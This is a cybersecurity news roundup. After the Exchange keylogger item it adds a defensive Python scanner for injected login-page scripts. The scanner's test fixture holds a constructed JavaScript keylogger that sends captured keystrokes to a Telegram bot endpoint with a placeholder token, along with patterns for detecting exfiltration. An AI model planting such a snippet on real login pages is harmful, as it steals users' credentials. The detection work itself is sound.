Hackers target over 70 Microsoft Exchange servers to steal credentials via keyloggers
Unidentified attackers are targeting over 70 publicly exposed Microsoft Exchange servers by injecting JavaScript-based keyloggers into login pages to steal credentials. According to Positive Technologies, the campaign spans 26 countries and exploits known Exchange vulnerabilities like ProxyShell and ProxyLogon, with some attacks dating back to 2021. Exfiltration methods include local file storage, Telegram bots, and DNS tunnels, making detection difficult while capturing credentials and user data in plaintext.
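The campaign above works by planting a small inline script on the server's own login page, so one practical defender check is to pull that page from each Exchange server and compare its inline scripts against a known-clean baseline, then flag any script that combines keystroke capture with one of the exfiltration channels named in the report. The scanner below is an added example, not code from Positive Technologies or the report; the OWA-style HTML fixtures, the hostnames and the Telegram token in them are constructed, and the indicator patterns are heuristics you would tune to your own pages.

```python
"""Heuristic scan of an Exchange/OWA login page for an injected JavaScript keylogger.

Added example, not part of the Positive Technologies report. It inspects HTML
text passed in (e.g. saved from the server's own login page), so it runs
offline on the constructed fixtures below. Two checks: an allow-list of inline
script hashes taken from a known-clean server, and indicator patterns for
keystroke capture paired with the exfiltration channels the report names
(Telegram bot API, DNS-style hostname building, generic network sends).
"""
import hashlib
import re
from html.parser import HTMLParser


class _ScriptCollector(HTMLParser):
    """Collects the bodies of inline <script> elements (external src scripts are skipped)."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.inline = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script" and not dict(attrs).get("src"):
            self._in_script = True
            self.inline.append("")

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data


# Keystroke capture: addEventListener('keydown'), document.onkeypress = ..., $(x).on('keyup'
KEY_CAPTURE = re.compile(r"(?:addEventListener\(\s*['\"]|\.on\(\s*['\"]|\.on)key(?:down|up|press)")

# Exfiltration sinks (heuristic patterns, tuned to the channels the campaign used)
SINKS = {
    "telegram-bot-api": re.compile(r"api\.telegram\.org/bot", re.I),
    "network-send": re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b"),
    # encoded data glued onto a domain suffix, e.g. btoa(x) + '.exfil.example'
    "dns-label-concatenation": re.compile(r"\+\s*['\"]\.[a-z0-9-]+(?:\.[a-z0-9-]+)+['\"]", re.I),
}
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def script_hashes(html):
    """SHA-256 of every inline script; run this against a clean server to build the baseline."""
    p = _ScriptCollector()
    p.feed(html)
    return {hashlib.sha256(b.strip().encode()).hexdigest() for b in p.inline}


def scan_login_page(html, expected_hashes=None, allowed_hosts=()):
    """Return one finding per suspicious inline script (empty list if nothing is flagged)."""
    p = _ScriptCollector()
    p.feed(html)
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for idx, body in enumerate(p.inline):
        digest = hashlib.sha256(body.strip().encode()).hexdigest()
        if expected_hashes is not None and digest in expected_hashes:
            continue  # byte-identical to a script on the clean baseline server
        reasons = []
        if KEY_CAPTURE.search(body):
            reasons.append("keystroke-listener")
        reasons += [name for name, pat in SINKS.items() if pat.search(body)]
        foreign = sorted({h.lower() for h in URL_HOST.findall(body)} - allowed)
        if foreign:
            reasons.append("external-host:" + ",".join(foreign))
        if expected_hashes is not None:
            reasons.append("not-in-baseline")
        has_capture = "keystroke-listener" in reasons
        exfil = [r for r in reasons if r not in ("keystroke-listener", "not-in-baseline")]
        # Report capture paired with a sink, or any script the clean baseline does not know
        if (has_capture and exfil) or "not-in-baseline" in reasons:
            findings.append({"script_index": idx, "sha256": digest, "reasons": reasons})
    return findings


# Constructed fixtures: a clean OWA-style login page and the same page with an injected script.
CLEAN_PAGE = """<html><body>
<form action="/owa/auth.owa" method="post">
<input id="username" name="username"><input id="password" name="password" type="password">
</form>
<script>document.getElementById('username').focus();</script>
</body></html>"""

INJECTED_SCRIPT = """<script>
document.addEventListener('keydown', function(e){ window._k = (window._k || '') + e.key; });
document.forms[0].addEventListener('submit', function(){
  fetch('https://api.telegram.org/bot000000:CONSTRUCTED_TOKEN/sendMessage?chat_id=1&text=' + encodeURIComponent(window._k));
});
</script>"""
INFECTED_PAGE = CLEAN_PAGE.replace("</body>", INJECTED_SCRIPT + "\n</body>")

if __name__ == "__main__":
    for finding in scan_login_page(INFECTED_PAGE, expected_hashes=script_hashes(CLEAN_PAGE)):
        print(finding)
```

Run `script_hashes()` once against a freshly patched server to get the baseline, then feed each exposed server's login page to `scan_login_page()` with that baseline and your own hostnames in `allowed_hosts`; the hash check catches any modification, while the pattern check still gives a useful verdict on servers for which no baseline exists.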
Apple, Netflix, Microsoft sites ‘hacked’ for tech support scams
Tech support scammers are exploiting Google Ads and search parameter injection to display fake support phone numbers on legitimate sites like Apple, Microsoft, and Netflix. Instead of spoofing websites, the attackers link to real support pages with manipulated URLs that show scammer numbers in search results, tricking users into calling them. Once engaged, the scammers aim to steal personal data, payment info, or gain remote access to victims’ devices.
The 2022 initiative by Cloudflare, CrowdStrike and Ping Identity provided cybersecurity support to critical infrastructure sectors seen as potential targets of Russia-linked attacks
Cloudflare, CrowdStrike, and Ping Identity have ended their free Critical Infrastructure Defense Project, originally launched in 2022 to protect sectors like healthcare and utilities from Russia-linked cyber threats. The shutdown comes as DHS warns Iranian hackers may retaliate against U.S. networks following recent U.S. strikes on Iran’s nuclear sites. The NTAS bulletin also cites growing risks of cyber and physical attacks from Iranian-aligned actors and extremist groups.
(NextGov)
New FileFix attack weaponizes Windows File Explorer for stealthy commands
A researcher has developed FileFix, a new variation of the ClickFix attack that tricks users into pasting malicious PowerShell commands into the Windows File Explorer address bar, enabling stealthy command execution. Unlike prior ClickFix attacks that relied on the Run dialog, FileFix uses a familiar UI and disguises the command behind a fake file path, likely to be adopted by threat actors due to its simplicity and ability to evade detection.
Huge thanks to our sponsor, ThreatLocker

Aflac, one of the USA’s largest insurers, is the latest to fall “under siege” to hackers
Aflac, one of the largest U.S. insurers, is investigating a data breach that may have exposed Social Security numbers, health data, and other sensitive customer information. The attack is suspected to be linked to Scattered Spider, a group known for low-tech social engineering tactics like impersonating employees to bypass security. Despite being labeled “highly sophisticated,” the methods reportedly involved phishing, SIM swapping, and MFA fatigue—not advanced exploits.
Russia releases REvil members after convictions for payment card fraud
A Russian court sentenced four REvil ransomware members for trafficking stolen U.S. payment card data but released them immediately, citing time served in pre-trial detention. The case wasn’t tied to REvil’s major ransomware attacks and is one of the rare instances of Russia prosecuting its own hackers, likely prompted by U.S. pressure in 2021.
Threat actor trojanizes copy of SonicWall NetExtender VPN app
A threat actor distributed a Trojanized version of SonicWall’s NetExtender VPN app, designed to steal user credentials and VPN configuration data. The malicious installer, signed by a suspicious entity, was hosted on attacker-controlled sites to trick users searching for the legitimate app. SonicWall and Microsoft have since mitigated the threat, revoked the fake certificate, and warned users to only download software from official sources.
Don’t panic, but it’s only a matter of time before critical ‘CitrixBleed 2’ is under attack
Citrix has patched a critical vulnerability dubbed “CitrixBleed 2,” affecting NetScaler ADC and Gateway products, which could allow unauthenticated attackers to access sensitive memory data like session tokens. The flaw is similar to the original CitrixBleed, which was heavily exploited by ransomware groups, and experts warn it’s only a matter of time before this new bug is targeted. Citrix urges immediate patching and session-killing commands to mitigate the threat, especially as updated CVE descriptions suggest the risk is more severe than initially disclosed.